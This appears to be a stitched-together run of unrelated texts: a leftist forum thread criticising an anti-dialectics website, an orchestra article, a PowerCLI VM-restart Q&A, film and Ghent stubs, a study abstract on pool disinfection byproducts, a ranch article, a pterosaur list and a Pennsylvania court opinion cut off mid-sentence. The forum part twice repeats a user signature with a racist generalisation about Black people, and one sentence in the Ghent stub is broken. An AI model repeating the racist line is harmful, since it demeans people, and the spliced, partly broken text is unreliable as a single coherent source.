To despise the enemy strategically is an elementary requirement for a revolutionary. Without the courage to despise the enemy and without daring to win, it will be simply impossible to make revolution and wage a people’s war, let alone to achieve victory. ~Lin Biaohttp://commiforum.forumotion.com/
The creator of the Anti-Dialectics site and seemingly endless chunks of text was a very prolific poster on revleft. I find it very strange.
I appreciate the comments above. There's a strange question about what it is to be a 'Marxist'. Is it a particular view of history or social class or economics, an ethical commitment, or membership or activity in a party or movement? Or none or all of those?
@YABM, there is a possibility that Marxism is wrong. There's also the possibility that Orthodox Marxism or specific types of Marxist thought are useful and applicable to particular questions. In my opinion, the single best contribution to Marxist thought in the past 50 years has been Braverman's Labor and Monopoly Capital which in many ways was in many ways deliberately crude theoretically. Braverman acknowledges in his introduction to the book that he is NOT addressing questions of ideology, identity, consciousness, strategy and so on, though they do come up, but his focus was on work and workers and how workers worked and bosses bossed. Great.
I think the owner of that site used to post a lot on Revleft before they were banned. To be honest, I could never be bothered reading any of his/her book-length posts and I'm not about to start either.
[FONT=Trebuchet MS]I have added approximately 35,000 words of new material (thus making the Essay 25% longer)[/FONT]
[FONT=Trebuchet MS]I have added just over 21,000 words of new material (making the Essay about 12% longer)[/FONT]
[FONT=Trebuchet MS]I have added about 7,000 words of new material (making it approximately 12% longer)[/FONT]
etc. and then says they've fixed most of the mistakes, it is difficult to maintain any interest.
When we were still on sort of friendly debating terms, I made a joke at Rosa L about the word count stuff and nothing funny was seen in it. You buy toothpaste that way - 25% more per tube! - but essays on the philosophy and science of Marxism?
But, as can be found on the first page of the site, way down on the right:
[FONT=Trebuchet MS]Anyone who objects to the length of these Essays should rather pick a fight with Marx, Engels, Plekhanov, Lenin and Trotsky -- and Hegel -- whose collected work easily dwarfs my own.[/FONT]
The Following User Says Thank You to Brutus For This Useful Post:
I don't know man....its ok to be critical of DM, but abandoning it entirely is a vulgarization of Marxism in my opinion. Not to mention, most of her arguments, the few that are actually coherent, seem to have little merit. Without dialectics, would Marxism have even developed into a system/mode of analysis? Hard to imagine.
As I said before, it is like taking adaptation out of evolution, and still calling it such. DM is quite complex, and I'm barely grasping it but I understand the basics of it. I find it useful overall, as well as fascinating to read about. Though admittedly it was Historical Materialism that made me become a Marxist, rather than DM.
Re: Anti-Dialectics site....
Blasphemy! I'm still trying to get my head around diamat. I think that people who are having a hard time understanding it may go to the anti dialectics side, simply because it's simpler.
According to Rosa, dialectics is hard because it is nonsensical. She attempts to demonstrate this by taking dialectics to the absurd. Also, her core argument is about showing that with dialectics change is supposedly impossible (inverting the idea that dialectics accounts for change).
☭ “The ideas of the ruling class are in every epoch the ruling ideas, i.e. the class which is the ruling material force of society, is at the same time its ruling intellectual force.” - Karl Marx ☭
The Following 2 Users Say Thank You to Comrade #138672 For This Useful Post:
I saw that argument about how dialectics makes change impossible. Such a statement is pure mindfuckery I tell ya , and I have no idea how she came to that conclusion. Her whole rationale, if she even has any, is just plain bizarre. It would be like saying 'natural selection' and 'adaptation' prevent the course of evolution, lol.
'despite being a comedy, there's a lot of truth to this, black people always talking shit behind white peoples back. Blacks don't give a shit about white, why do whites give them so much "nice" attention?'
I have read some of the material on the site, and I'm not exactly impressed. The author makes an interesting point from time to time (concerning isomeric molecules for example), but their examples seem to provide new examples of dialectical change rather than disproving it (since changes in the position of molecules are quantitative changes leading to qualitative changes).
But the author's understanding of dialectical materialism is not as sound as the author believes it is. They constantly confuse materialist dialectics with Hegelian dialectics, and deal with opposite ideas instead of opposite tendencies in material phenomena.
They object, for example, that male cats do not change into female cats. But this is absurd; "male" and "female" are often considered as opposite concepts (I would have hoped that someone that calls themselves a Marxist would know better, though), but "male" and "female" are not contradictory tendencies in individual cats. On the level of the population, the number of male and female cats are contradictory, and indeed we see a complex interplay of these numbers, driven partly by internal sexual dynamics and partly by external influences.
I gave up on the section concerning the negation of the negation, where the author again tries to force dialectical materialism into the straightjacket of Hegelian triads and ignores the materialist meaning of the law - the retention of features of previous stages in new stages.
At best, the author has a point against Hegel and against poor Engels when he uncritically assimilates Hegel's examples. At worst, this is a left-ish version of the Time Cube site.
I don't know whether or not Rosa understands historical events. While she was making a fairly logical argument in the beginning, she's now blaming Dialectical materialism's logic for the collapse of the Soviet Union and she keeps referrencing Hegel, even though DM is supposed to be a total reverse of Hegel's idealism (hence why 'Marx turned Hegel on his head').
Still, an interesting viewpoint. I'll keep reading.
'despite being a comedy, there's a lot of truth to this, black people always talking shit behind white peoples back. Blacks don't give a shit about white, why do whites give them so much "nice" attention?'
Rosa is an odd-ball, although I agree with some criticisms of the DM; but I can't take Rosa seriously, he argued that vaccines are useless and blah blah, for all his rejection of DM he's some kind of strange mystic who argues endlessly but without substance in queer semantic games designed to confuse the reader/debatee.
Philosophy is bunk.
The revolutionary despises public opinion. He despises and hates the existing social morality in all its manifestations. For him, morality is everything which contributes to the triumph of the revolution. Immoral and criminal is everything that stands in its way.
The Following 3 Users Say Thank You to Sperm-Doll Setsuna For This Useful Post:
There has been a great amount of dialectical thought that is not orthodox "DM" or "diamat" or whatever you want to call it. Most of Rosa's criticisms seem to be about that orthodox school which no modern Marxist philosophers hold, as far as I can tell. A good book to try for an overview of modern philosophical dialectics is Fredric Jameson's "Valences of the Dialectic".
Further, I think the allegations of vagueness and such are not as watertight as Rosa would like to think. These allegations, if formal, are nonsensical due to the tired old critiques of positivism/"natural types"/vulgar empiricism. The definition of what is clear or non-vague necessarily rests on intuition, which is not uniform between people. If informal, they are also nonsensical due to, once again, their hypocritical vagueness.
If someone brings up more specific points, I can try to address those more thoroughly, but as has been remarked, there is just so much. |
The West-Eastern Divan is an orchestra for young people. It is based in Sevilla, Spain. The musicians in the orchestra come from Israel and its surrounding Arab countries.
The orchestra was started in 1999 by the Jewish conductor Daniel Barenboim and the Palestinian-American academic Edward Said (pronounce: Sah--eed). The name of the orchestra comes from a group of poems by the German poet Johann Wolfgang von Goethe.
The West-Eastern Divan Orchestra was started to help bring Israelis and Palestinians together to work for peace and to help solve the fight between Israel and Palestine. The idea was to let Israelis and Arabs work together in countries which had nothing to do with the conflict.
The first workshop of the orchestra took place in Weimar, Germany because it was the 1999 European cultural town. Barenboim chose two leaders for the orchestra: one Israeli and one Arab. They worked with some very famous musicians including the cellist Yo Yo Ma. In 2000 the orchestra met again in Weimar, in 2001 they met in Chicago. Since 2002 they have met every year in Seville.
The West-Eastern Divan Workshop takes place during several weeks each summer in Andalusia. After the workshop has finished, the orchestra travel to other places to give concerts. They have given concerts in many parts of Europe, North America, South America. In 2004 they performed an historic concert in Ramallah in Palestine. After the concert Barenboim said that the people of Israel and Palestine had a shared future. He said: "Either we all kill each other, or we share what there is to share. It is this message that we come here to bring."
In 2004, the Barenboim-Said Foundation, based in Seville, was started to help develop several education projects. Money is given for this by the Junta de Andalucia (Regional Government of Andalusia). The Foundation helps with the orchestra as well as with projects such as the Early Childhood Musical Education Project in Seville.
The orchestra has won prizes and made recordings. A film called Knowledge is the Beginning was made about them.
In August 2009 the orchestra will give three concerts at the BBC Proms including a concert performance of Beethoven's opera Fidelio which has a story about people who have been put in prison for their political ideas. |
Q:
powerCLI restart VM guest from script
i'm trying to run batch script which will call ps1 in order to restart VM guest.
it's working when i ran it seperate but the problem is that powerCLI on CMD load without the arguments.
i have tried run it by steps :
echo on
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noe -c ". \"C:\Program Files (x86)\VMware\Infrastructure\PowerCLI\Scripts\Initialize-PowerCLIEnvironment.ps1\" $true"
then on cmd :
connect -viserver -server "serverName" -Protocol https -User "user"-Password "pass"
then :
Restart-VM "VMserverName" -RunAsync -Confirm:$false
it is all works fine separately but when try to combine it all - it is not working.
seems like powerCLI load faster then the console write.
i have trying
Start-Sleep -s 10
command but with no success.
how can i combine all 3 commands above in one file?
A:
To execute PowerShell commands from a cmd, you will have to pass them along using the Command-Switch of from PowerShell.
You could achieve what you want by executing the following command:
powershell -Command "Import-Module VMware.VimAutomation.Core; Connect-VIServer -Server <server> -User <user> -Password <password>; Restart-VM <vm_name> -RunAsync -Confirm:$false"
This is a very cumbersome way of doing this. I would suggest directly using PowerShell and have at least the ability to properly format the script:
Import-Module VMware.VimAutomation.Core
Connect-VIServer -Server <server> -User <user> -Password <password>
Restart-VM <vm_name> -RunAsync -Confirm:$false
You would still be able to call this PowerShell script from a cmd, by using the File-Parameter:
powershell -File <script>
|
Wee Willie Winkie is a 1937 American adventure drama movie directed by John Ford and was based on the story by Rudyard Kipling. It stars Shirley Temple, Victor McLaglen, C. Aubrey Smith, Cesar Romero, June Lang, Brandon Hurst, Lionel Pape, Cyril McLaglen and was distributed by 20th Century Fox. It was nominated for an Academy Award in 1938. |
Progressive Increase in Disinfection Byproducts and Mutagenicity from Source to Tap to Swimming Pool and Spa Water: Impact of Human Inputs.
Pools and spas are enjoyed throughout the world for exercise and relaxation. However, there are no previous studies on mutagenicity of disinfected spa (hot tub) waters or comprehensive identification of disinfection byproducts (DBPs) formed in spas. Using 28 water samples from seven sites, we report the first integrated mutagenicity and comprehensive analytical chemistry of spas treated with chlorine, bromine, or ozone, along with pools treated with these same disinfectants. Gas chromatography (GC) with high-resolution mass spectrometry, membrane-introduction mass spectrometry, and GC-electron capture detection were used to comprehensively identify and quantify DBPs and other contaminants. Mutagenicity was assessed by the Salmonella mutagenicity assay. More than 100 DBPs were identified, including a new class of DBPs, bromoimidazoles. Organic extracts of brominated pool/spa waters were 1.8× more mutagenic than chlorinated ones; spa waters were 1.7× more mutagenic than pools. Pool and spa samples were 2.4 and 4.1× more mutagenic, respectively, than corresponding tap waters. The concentration of the sum of 21 DBPs measured quantitatively increased from finished to tap to pool to spa; and mutagenic potency increased from finished/tap to pools to spas. Mutagenic potencies of samples from a chlorinated site correlated best with brominated haloacetic acid concentrations (Br-HAAs) (r = 0.98) and nitrogen-containing DBPs (N-DBPs) (r = 0.97) and the least with Br-trihalomethanes (r = 0.29) and Br-N-DBPs (r = 0.04). The mutagenic potencies of samples from a brominated site correlated best (r = 0.82) with the concentrations of the nine HAAs, Br-HAAs, and Br-DBPs. Human use increased significantly the DBP concentrations and mutagenic potencies for most pools and spas. These data provide evidence that human precursors can increase mutagenic potencies of pools and spas and that this increase is associated with increased DBP concentrations. |
Gent is a municipality in the Belgian province of East Flanders. In 2019, 262,219 people lived there.
It is at .
Ghent is known for its cultural landmarks and punk rock music industry.
Related pages
Treaty of Ghent |
How the Sand Ranch Became Profitable (And How You Can Do It Too!)
This is the first in a series that ran through May of 2016. It takes us through the changes that Cody and Deanna Sand made to their operation that mad their ranch profitable and their lives more fun. Cody and Deanna shared their story at NatGLC’s 2015 grazing conference. Enjoy!
The year that they sold their calves and still couldn’t pay all their bills, Cody and Deanna Sand asked their banker what they should do for the coming year. His suggestion, to borrow more money, just wasn’t going work. Between Deanna’s off-farm job and Cody making and repairing saddles and working on the farm, they were already working harder and harder, having less and less fun and going further into debt. Something had to change, and fast! What they did is a testament to what happens when you look at your problems in a new way and then dig in and do something about them.
Holistic Management Course Paves the Way
The Sand Ranch is near Forbes, North Dakota. It was started by Deanna’s grandparents and Cody and Deanna took it over from her parents in 1999 and then purchased it in 2001 They continued to run the cow calf operation as it had always been run. They calved their cows in March and their heifers in April, running them in 2 to 3 minimally rotated groups through the summer. They grew and put up 3,000 bales of hay a summer, and fed through the winter. Calves were weaned, backgrounded and sold. Through it all, Deanna drove 60 miles one way to work every day and Cody built saddles at home.
The harder they worked, the less fun it was for everyone, and when, in 2010 they still had $20,000 in carry over bills after all the calves were sold, the look on her husband’s face told Deanna something had to change. Shortly after, they learned about a Holistic Management course being presented by Josh Dukart, and they signed up for it immediately. For 3 days in February of 2011, with temperatures dropping to -42 F they drove back and forth to Bismarck for the course, feeding cattle at home, and feeding their brains in Bismarck. The reward was a new way to look at their ranch and how they could run it.
Deanna shares their “Ah Ha!” moments in this slide from their presentation at the 2015 North Dakota Grazing Lands Coalition winter meeting. From timing of calving to reducing haying and better managing their grazing, Deanna and Cody went home with ideas they could start implementing almost immediately. But most importantly, they saw how doing these things could improve their quality of life so that ranching could be fun again.
First Things First
Three and a half tons of wire – the last load as the Sands trimmed their equipment and paid off debt.
What they really wanted to do was change their calving season from March and April to May and June. But since the cows were already bred, they were stuck for one more calving season. Instead, they stopped spending money and began paying off debt by selling off equipment. The calf shelters, tire tanks and windbreaks went, as did some haying equipment and anything else they weren’t going to need under new management.
Next, they changed their summer grazing routine. Instead of 3 to 4 groups, they put all the cattle into one herd. This decreased the time spent checking the fence and moving the cows. In class, they’d learned that they had been under-stocking and over-grazing. Now they graze more animals in a smaller area for less time, which has improved soil health and forage. The Kentucky blue grass invasion is slowing and diversity is exploding. The litter mat they leave behind reduces rain run off, and decreases soil temperatures and evaporation. In fact, the grazed pastures are in better shape than ungrazed acres as their daughter Dessa discovered with her Science Fair Project.
Top bars show never grazed and season long grazed CRP. Bottom 2 bars show managed grazing on CRP and then on native rangeland. Click to see a larger view.
As other large scale graziers have noted, one of the biggest benefits of their new grazing management style is rest and recovery. Now, Sand Ranch cattle are only in some pasture for a few days a year. Even when Cody worries that they’ve made a mistake and grazed one spot too long, he’s learned that it actually comes back better than before after a good rest.
Who Knew Cows Could Calve Their Own?!
Changing to May June calving means the Sands don’t have “Gopher” cows anymore. This 7 year old cow is one of their best, but she was born in the old days when freezing temps could ruin a cows ears and good looks.
The next change was moving calving season from March and April to May and June. Though it was hard that first year to hold off putting the bulls in with the cows at the same time that everyone else was doing it, the rewards made up for it. First, the cows nutritional requirements are reduced during they winter months. So the Sands save money because they don’t have to supplement the cows with hay before and after calving. In the old days, feeding in March and April was a big expense. Now, the cows meet their nutritional requirements by grazing on the lush spring grass.
They also save time on checking the herd during calving. Cody says that the first year they went and checked the herd 2 to 3 times a day out of habit. But now, they know that the cows are going to calve without help, so this year they only checked on them when they were moving them to a new pasture. They rarely have to pull calves now, and they’re even reducing this problem. They get rid of problem cows every year so that their herd becomes stronger and stronger.
The calves are healthier thanks to a later calving season. There are no more scours or pneumonia to deal with. The family is healthier too because they don’t have to leave the house in a blizzard. His one worry, predators, have turned out not to be a problem at all. Predators have not been a problem calving on green grass. The 3 to 4 coyotes on his place have plenty of other, easier food options in May and June.
Cody says that if he had to go back to calving in the cold and snow of “spring” he would probably give up cattle. In addition to how much easier their lives have become, they’ also reduced input costs. Here are all the things they got rid of by changing to May/June calving:
So far so good, right? But what about fencing all those new pastures for their new management? And what do they do in winter? What about hay? And what are the changes in heifer management and marketing that come with a later calving season? We’ll share the Sands’ answers to those questions in the next articles. Click here to read Part 2.
About the author
Kathy worked with the Bureau of Land Management for 12 years before founding Livestock for Landscapes in 2004. Her twelve years at the agency allowed her to pursue her goal of helping communities find ways to live profitably AND sustainably in their environment. She has been researching and working with livestock as a land management tool for over a decade. When she's not helping farmers, ranchers and land managers on-site, she writes articles, and books, and edits videos to help others turn their livestock into landscape managers. |
This is a list of pterosaurs.
A
Aetodactylus
Angustinaripterus
Anhanguera
Anurognathus
Arambourgiania
Araripedactylus
Araripesaurus
Arthurdactylus
Austriadactylus
Avgodectes
Azhdarcho
B
Bakonydraco
Batrachognathus
Beipiaopterus
Bennettazhia
Bogolubovia
Boreopterus
Brasileodactylus
C
Cacibupteryx
Campylognathoides
Caulkicephalus
Caviramus
Cearadactylus
Chaoyangopterus
Coloborhynchus
Comodactylus
Criorhynchus
Ctenochasma
Cycnorhamphus
D
Darwinopterus
Dendrorhynchoides
Dermodactylus
Dimorphodon
Diopocephalus
Domeykodactylus
Dorygnathus
Dsungaripterus
E
Eoazhdarcho
Eopteranodon
Eosipterus
Eudimorphodon
F
Feilongus
G
Germanodactylus
Gnathosaurus
Gallodactylus
H
Haopterus
Harpactognathus
Hatzegopteryx
Herbstosaurus
Huanhepterus
Huaxiapterus
I
Istiodactylus
J
Jeholopterus
Jidapterus
K
Kepodactylus
L
Laopteryx
Liaoxipterus
Lonchodectes
Lonchognathosaurus
Longchengpterus
Ludodactylus
M
Mesadactylus
Montanazhdarcho
N
Nesodactylus
Noripterus
Normannognathus
Nurhachius
Nyctosaurus
O
Ornithocheirus
Ornithostoma
P
Parapsicephalus
Peteinosaurus
Phosphatodraco
Plataleorhynchus
Preondactylus
Pteranodon
Pterodactylus
Pterodaustro
Pterorhynchus
Puntanipterus
Q
Quetzalcoatlus
R
Rhamphinion
Rhamphocephalus
Rhamphorhynchus
S
Santanadactylus
Scaphognathus
Sinopterus
Siroccopteryx
Sordes
T
Tapejara
Tendaguripterus
Thalassodromeus
Tropeognathus
Tupandactylus
Tupuxuara
U
Unwindia
V
Volgadraco
Vectidraco
W
Wukongopteryx
X
Xericeps
Y
Yikianopteryx
Z
Zhejiangopterus
Lists of animals |
J-S76045-16
NON-PRECEDENTIAL DECISION - SEE SUPERIOR COURT I.O.P. 65.37
COMMONWEALTH OF PENNSYLVANIA IN THE SUPERIOR COURT OF
PENNSYLVANIA
Appellee
v.
JAMIE KIRNON
Appellant No. 1101 EDA 2016
Appeal from the PCRA Order March 8, 2016
In the Court of Common Pleas of Philadelphia County
Criminal Division at No(s): CP-51-CR-0503741-2001
BEFORE: STABILE, J., DUBOW, J., and STEVENS, P.J.E.*
MEMORANDUM BY STEVENS, P.J.E.: FILED OCTOBER 21, 2016
Appellant Jamie Kirnon appeals from the order entered in the Court of
Common Pleas of Philadelphia County on March 8, 2016, dismissing as
untimely his third petition filed pursuant to the Post Conviction Relief Act
(“PCRA”), 42 Pa.C.S.A. §§ 9541-9546. We affirm.
In 1998, Appellant and his cohort, Rafael Stewart, shot and killed
Darius Cuthbert and seriously wounded Omar Johnson in connection with a
drug-related confrontation. Following a jury trial, on November 4, 2003,
Appellant was convicted of first-degree murder, aggravated assault, criminal
conspiracy, possessing an instrument of crime and carrying a firearm on a
____________________________________________
*
Former Justice specially assigned to the Superior Court.
J-S76045-16
public street.1 On November 5, 2003, following the penalty phase of the
trial, the jury sentenced Appellant to life imprisonment on the first-degree
murder conviction, and on December 22, 2003, the trial court imposed
consecutive sentences for the criminal conspiracy and aggravated assault
convictions.
Following the denial of his post-sentence motion, Appellant filed a
timely appeal. This Court affirmed Appellant’s judgment of sentence on
January 13, 2005, and Appellant did not seek further review with our
Supreme Court. On January 13, 2006, Appellant filed, pro se, a timely PCRA
petition. Counsel was appointed, and by order and opinion entered on
October 5, 2006, the PCRA court dismissed Appellant’s petition and
permitted counsel to withdraw. Appellant filed a second petition on June 2,
2011, and the PCRA court dismissed it as untimely on March 5, 2014. On
appeal, this Court affirmed both PCRA orders.
Appellant filed the instant PCRA petition, pro se, on January 30, 2015,
as well as several amended petitions thereafter. Appellant retained counsel
who requested leave to amend. The PCRA court granted that relief on June
2, 2015, and Appellant filed his Amended Motion for Post Conviction Relief
on August 28, 2015. The basis for Appellant’s initial petition and amended,
counseled petition arises from the testimony Mr. Johnson provided at Mr.
____________________________________________
1
18 Pa.C.S.A. §§ 2502, 2702, 903, 6108, and 907, respectively.
-2-
J-S76045-16
Stewart’s trial in 2014 which Appellant avers constitutes newly discovered
evidence.2
On March 8, 2016, the PCRA court dismissed Appellant’s petition as
untimely, and Appellant filed a timely notice of appeal on April 6, 2016. The
PCRA court did not direct Appellant to file a statement of matters complained
of on appeal pursuant to Pa.R.A.P. 1925(b), and Appellant did not file one.
The PCRA court filed its Opinion pursuant to Pa.R.A.P. 1925(a) on April 26,
2016, wherein it requested that this Court affirm its order dismissing
appellant’s PCRA petition for the reasons contained in its March 8, 2016,
opinion.
In his brief, Appellant presents the following Statement of the
Question Involved:
Did the PCRA court err and violate Appellant’s Fourth, Sixth and
Fourteenth Amendment rights by finding that the new evidence
petition was untimely filed?
Appellant’s Brief at 4. The text of Appellant’s brief essentially reiterates the
claims he made in his Amended Motion for Post Conviction Relief filed on
August 28, 2015.
Preliminarily, we must determine whether Appellant’s instant PCRA
petition was timely filed. See Commonwealth v. Hutchins, 760 A.2d 50
____________________________________________
2
After the shooting, Mr. Stewart had been “on the run” and was not
apprehended and brought to trial until 2014.
-3-
J-S76045-16
(Pa.Super. 2000). “Our standard of review is whether the PCRA court’s
order is supported by the record and without legal error.” Commonwealth
v. Wojtaszek, 951 A.2d 1169, 1170 (Pa.Super. 2008) (citation omitted).
Pennsylvania law makes it clear that no court has jurisdiction to hear
an untimely PCRA petition. Commonwealth v. Robinson, 575 Pa. 500,
837 A.2d 1157 (2003). The most recent amendments to the PCRA, effective
January 19, 1996, provide that a PCRA petition, including a second or
subsequent petition, shall be filed within one year of the date the underlying
judgment becomes final. 42 Pa.C.S.A. § 9545(b)(1). A judgment is deemed
final “at the conclusion of direct review, including discretionary review in the
Supreme Court of the United States and the Supreme Court of Pennsylvania,
or at the expiration of time for seeking review.” 42 Pa.C.S.A. § 9545(b)(3).
The three statutory exceptions to the timeliness provisions in the PCRA
allow for very limited circumstances under which the late filing of a petition
will be excused. 42 Pa.C.S.A. § 9545(b)(1). To invoke an exception, a
petition must allege and the petitioner must prove:
(i) the failure to raise the claim previously was the result of
interference by government officials with the
presentation of the claim in violation of the Constitution
or the law of this Commonwealth or the Constitution or
law of the United States;
(ii) the facts upon which the claim is predicated were
unknown to the petitioner and could not have been
ascertained by the exercise of due diligence; or
(iii) the right asserted is a constitutional right that was
recognized by the Supreme Court of Pennsylvania after
-4-
J-S76045-16
the time period provided in this section and has been
held by that court to apply retroactively.
42 Pa.C.S.A. § 9545(b)(1)(i)-(iii).
“We emphasize that it is the petitioner who bears the burden to allege
and prove that one of the timeliness exceptions applies.” Commonwealth
v. Marshall, 596 Pa. 587, 596, 947 A.2d 714, 719 (2008) (citation
omitted).
In the case sub judice, Appellant was sentenced to life imprisonment
on November 5, 2003, and to consecutive prison sentences for aggravated
assault and criminal conspiracy on December 22, 2003. This Court affirmed
his judgment of sentence on January 13, 2005. Appellant did not file a
petition for allowance of appeal; therefore, Appellant’s judgment of sentence
became final thirty days thereafter, on February 12, 2005, when the time for
seeking allocator with our Supreme Court expired. See 42 Pa.C.S.A. §
9545(b)(3) (providing “a judgment becomes final at the conclusion of direct
review, including discretionary review in the Supreme Court of the United
States and the Supreme Court of Pennsylvania, or at the expiration of time
for seeking the review[ ]”). Thus, Appellant had until February 13, 2006, to
file a timely PCRA petition; however, Appellant filed the instant PCRA
petition on January 30, 2015; therefore, it is patently untimely under the
PCRA. See 42 Pa.C.S.A. § 9545(b)(1); Commonwealth v. Gamboa-
Taylor, 562 Pa. 70, 753 A.2d 780 (2000) (holding a PCRA petition filed
more than one year after judgment of sentence becomes final is untimely
-5-
J-S76045-16
and the PCRA court lacks jurisdiction to address the petition unless the
petitioner pleads and proves a statutory exception to the PCRA time-bar).
As such, the PCRA court could not address the merits of Appellant’s petition
unless a timeliness exception applies.
Appellant attempts to invoke the timeliness exception of 42 Pa.C.S.A.
§ 9545(b)(1)(ii) by claiming the testimony provided by Mr. Johnson during
Mr. Stewart’s trial constitutes newly discovered evidence. Appellant alleges
he first became aware of Mr. Stewarts’s trial from a newspaper article
published on November 19, 2014, but he was unable to obtain the trial
transcripts until April 15, 2015. See Amended Motion for Post Conviction
Relief at 6-7 (unnumbered). Appellant maintains that upon reading the
notes of testimony he learned Mr. Johnson had committed the crime of
perjury as to “key material issues” when he testified at Appellant’s trial, a
fact which he could not establish until Mr. Johnson testified in Mr. Stewart’s
case. Id. at 9, 11 (unnumbered).
Appellant avers that while Mr. Johnson testified at Appellant’s trial that
the shooting occurred in response to the victim’s having attempted to take
over a “coke house,” he stated at Mr. Stewart’s trial that Appellant and
Stewart shot him because he and Mr. Cuthbert had robbed the “drug house,”
which went to the motive for the crime. Id. at 11. Appellant further notes
that while at the first trial Mr. Johnson had indicated he and others had been
merely standing on the corner prior to the shooting, at the Stewart trial he
-6-
J-S76045-16
stated he and others had been selling drugs on the corner. Id. at 12.
Finally, Appellant stresses that Mr. Johnson maintained at Appellant’s trial an
individual nicknamed “Nasty”3 had not been on the corner with them that
evening, and in reliance upon this testimony, the defense did not call Mr.
Arthur to testify as an eyewitness to the shooting. To the contrary, at Mr.
Stewart’s trial, Mr. Johnson indicated “Nasty” was standing on the corner at
the time of the shooting, which Appellant argues would have made his
testimony as an eyewitness to the shooting vital at trial. Id. at 13-14.
Although he acknowledged that “Johnson’s recantation still inculpates
[Appellant] as Stewart’s accomplice,” Appellant baldly posits “the prejudicial
impact that Johnson’s perjury had on [Appellant’s] verdict is of constitutional
dimension.” Id. at 14.
Our Supreme Court previously has stressed that the newly discovered
evidence exception in Section 9545(b)(1)(ii) requires a petitioner to allege
and prove that there were “facts” that were “unknown” to him and that he
could not have ascertained those facts by the exercise of “due diligence.”
Commonwealth v. Bennett, 593 Pa. 382, 930 A.2d 1264, 1270-72
(2007). To do so, an Appellant must prove that “(1) the evidence has been
discovered after trial and it could not have been obtained at or prior to trial
through reasonable diligence; (2) the evidence is not cumulative; (3) it is
____________________________________________
3
“Nasty’s” given name is Lester Arthur.
-7-
J-S76045-16
not being used solely to impeach credibility; and (4) it would likely compel a
different verdict.” Commonwealth v. D’Amato, 579 Pa. 490, 519, 856
A.2d 806, 823 (2004). Moreover, “[d]ue diligence demands that the
petitioner take reasonable steps to protect his own interests. A petitioner
must explain why he could not have learned the new fact(s) earlier with the
exercise of due diligence. This rule is strictly enforced.” Commonwealth
v. Williams, 35 A.3d 44, 53 (Pa.Super. 2011) (citations omitted). Further,
“[t]he focus of the exception is on the newly discovered facts, not on a
newly discovered or newly willing source for previously known facts.”
Commonwealth v. Marshall, 596 Pa. 587, 596, 947 A.2d 714, 720 (2008)
(emphasis in original).
Additionally, as this Court has often explained, all of the time-bar
exceptions are subject to a separate deadline.
The statutory exceptions to the timeliness requirements of
the PCRA are also subject to a separate time limitation and must
be filed within sixty (60) days of the time the claim could first
have been presented. See 42 Pa.C.S.A. § 9545(b)(2). The sixty
(60) day time limit . . . runs from the date the petitioner first
learned of the alleged after-discovered facts. A petitioner must
explain when he first learned of the facts underlying his PCRA
claims and show that he brought his claim within sixty (60) days
thereafter.
Williams, 35 A.3d at 53 (citations omitted).
-8-
J-S76045-16
In the case sub judice, assuming, arguendo, Appellant met the initial
60-day threshold,4 we conclude the trial court did not abuse its discretion in
finding Mr. Johnson’s testimony did not provide “unknown facts.”5 In this
regard, when determining that it lacked jurisdiction over Appellant’s third
PCRA petition, the PCRA court reasoned as follows:
The newly-discovered evidence-- Mr. Johnson’s testimony in the
Stewart trial-- are [sic] only minor inconsistencies from his
original testimony in [Appellant’s] case. The variations between
the statements would merely be used to impeach Mr. Johnson’s
credibility,6 which fails to qualify as after discovered evidence.
Additionally, whether Lester Arthur was with Mr. Johnson
at the corner of the shooting, or a city block away, does not
amount to newly discovered evidence. As the Supreme Court of
Pennsylvania clarified in Commonwealth v. Bennet, 930 A.2d
1264, 1272 (Pa. 2007), a defendant “must also prove that the
facts were ‘unknown’ to him and that he could not uncover them
with the exercise of ‘due diligence.’” [Appellant] states that he
relied upon Mr. Johnson’s testimony as to Mr. Arthur’s view of
the incident, and chose not to call Mr. Arthur as a witness on the
____________________________________________
4
Appellant asserts that his sister, Margaret Shaw, acquired the notes of
testimony from Mr. Stewart’s trial on March 18, 2015, and mailed them to
Appellant at SCI Dallas where they were allegedly confiscated by the
correctional institute as contraband and were not released to Appellant until
April 15, 2015. Appellant’s Brief at 11-12.
5
It is noteworthy that although Appellant cites to and references Mr.
Johnson’s testimony from Mr. Stewart’s’ trial to support his claims, he has
failed to provide us with a complete trial transcript; therefore, our review of
the testimony is limited to the excerpts thereof which Appellant attached to
his pro se PCRA petition filed on May 12, 2015. We remind Appellant that
“[i]t is black letter law in this jurisdiction that an appellate court cannot
consider anything which is not part of the record in the case. It is also well-
settled in this jurisdiction that it is Appellant's responsibility to supply this
Court with a complete record for purposes of review.” Commonwealth v.
Martz, 926 A.2d 514, 524–525 (Pa.Super. 2007) (citations omitted) appeal
denied, 940 A.2d 363 (Pa. 2008).
-9-
J-S76045-16
belief that he would not provide any helpful information. See
Amended Petition, at[] 13. Rather than conducting due diligence
at the time of trial and question Mr. Arthur as to what he
witnessed, [Appellant] waited until Mr. Johnson’s testimony
eleven years after the fact to consider whether Mr. Arthur has
any relevant information.[7]
More importantly, any differences between the two
testimonies cannot overcome the pivotal fact which Mr. Johnson
reiterated in the Stewart trial- that [Appellant] was one of the
shooters. There is no basis to conclude that the inconsistencies
would likely compel a different outcome.
__
6
For example, this court cannot imagine that the jury would hold
Mr. Johnson’s testimony in a different light had they [sic] been
informed that Mr. Johnson, along with Messrs. Cuthbert and
Gissentanner, were selling drugs immediately before the
shooting. Not only had Mr. Johnson testified during [Appellant’s]
trial that he sold drugs from 1996 to 1998 and was arrested for
selling drugs in 2001, the jury was also informed that Mr.
Johnson was in custody awaiting trial for murder in New York.
7
In fact, [Appellant] did not attach a sworn affidavit from Mr.
Arthur, and again relies on Mr. Johnson’s memory if Mr. Arthur
might have witnessed the murder.
Trial Court Opinion, filed 3/8/16, at 4-5.
Upon our review of the excerpts of Mr. Johnson’s testimony which
Appellant has provided for our review, we agree with the PCRA court’s
finding that Appellant has failed to demonstrate such testimony satisfies the
newly discovered evidence exception to the PCRA time bar. Rather than
demonstrate Johnson committed perjury at Appellant’s trial, the
inconsistencies in his testimony at the two proceedings, which were
separated by ten years, pertain to such details as where individuals were
standing and what they were doing at the time of the shooting. While one’s
memory of such details is likely to be affected by the passage of time,
- 10 -
J-S76045-16
significantly, Mr. Johnson never wavered in his identification of Appellant as
a shooter at Appellant’s trial, and he reaffirmed Appellant shot repeatedly at
him at Mr. Stewart’s trial. N.T. Stewart Trial, 11/13/14, at 23-25.6 As
such, Mr. Johnson’s testimony cannot be viewed as exculpatory evidence,
but rather its use would be solely to impeach his prior testimony.
Commonwealth v. Padillas, 997 A.2d 356, 365 (Pa.Super. 2010) (“a
